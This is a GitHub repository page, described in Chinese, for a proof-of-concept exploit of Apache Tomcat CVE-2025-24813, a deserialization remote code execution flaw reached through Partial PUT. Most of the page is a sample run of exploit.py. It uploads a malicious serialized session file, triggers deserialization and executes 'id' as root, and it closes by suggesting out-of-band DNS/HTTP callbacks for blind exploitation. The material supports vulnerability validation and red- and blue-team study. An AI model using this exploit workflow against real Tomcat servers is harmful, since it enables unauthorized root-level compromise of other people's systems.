gunyakit/CVE-2025-24813-PoC-exploit

GitHub: gunyakit/CVE-2025-24813-PoC-exploit

Apache Tomcat CVE-2025-24813 反序列化 RCE 漏洞的 PoC 利用工具，通过 Partial PUT 上传恶意序列化 payload 实现远程代码执行。

Stars: 0 | Forks: 0

# CVE-2025-24813-PoC-exploit Apache Tomcat 反序列化 RCE ``` ❯ python3 exploit.py http://localhost:8080/ "id" ============================================================ CVE-2025-24813 - Apache Tomcat Partial PUT RCE ============================================================ [*] Target: http://localhost:8080 [*] Command: id [*] Creating exploit payload... [*] Uploading payload via PUT to: http://localhost:8080/session/exploit.session [*] PUT Response: 201 [+] Payload uploaded successfully! [*] Triggering deserialization... [*] Trigger Response: 200 [*] Response body: Deserialization Triggered!

⚠️ Deserialization RCE Triggered!

Session file deserialized: exploit.session

Command executed: id


uid=0(root) gid=0(root) groups=0(root)

[*] Exploit complete! If deserialization worked, check target for command execution. For blind RCE, use out-of-band techniques (DNS/HTTP callbacks) ```

标签：Apache Tomcat, CISA项目, CVE-2025-24813, Maven, Partial PUT, PoC, RCE, Web安全, Web报告查看器, 反序列化漏洞, 攻击脚本, 数据展示, 暴力破解, 漏洞验证, 红队, 编程工具, 网络安全, 蓝队分析, 远程代码执行, 隐私保护, 高危漏洞